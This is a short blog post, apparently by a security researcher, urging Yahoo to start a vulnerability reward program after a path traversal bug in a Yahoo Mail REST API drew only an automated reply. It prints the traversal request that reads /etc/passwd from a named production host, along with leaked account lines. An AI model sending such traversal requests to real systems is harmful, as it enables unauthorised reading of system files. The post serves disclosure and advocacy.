Yahoo, please start with a Vulnerability Reward Program
Last year I discovered a LFI/Path Traversal vulnerability in a REST-API used by Yahoo Mail and I got a automated mail from their mailer. I refused to report more bugs to them because it's boring to talk with bots.
GET /v2/xframe/../../../../../../../etc/passwd?bc HTTP/1.1 Host: prod1.rest-notify.msg.yahoo.com HTTP/1.1 200 OK Connection: close Expires: Thu, 15 Apr 2020 20:00:00 GMT Content-Type: text/html; charset=utf-8 Content-Length: 29676 root:*:0:0:Charlie &:/root:/usr/local/bin/bash toor:*:0:0:Bourne-again Superuser:/root:/bin/sh daemon:*:1:1:Owner of many system processes:/root:/sbin/nologin operator:*:2:5:System &:/:/sbin/nologin
Some minutes later I got a automated reply from Yahoo Security Contact (security at yahoo-inc.com)
Thank you for contacting Yahoo!. These issues have been passed along to the correct teams to investigate. Should a fix be required, we will again contact you and ask that you see the issues as resolved.
Thanks again, Yahoo! Security Contact
Days later the issue was fixed. But no more replies from them!
Yahoo, please start with a Vulnerability Reward Program and get in touch with the community - before it's too late.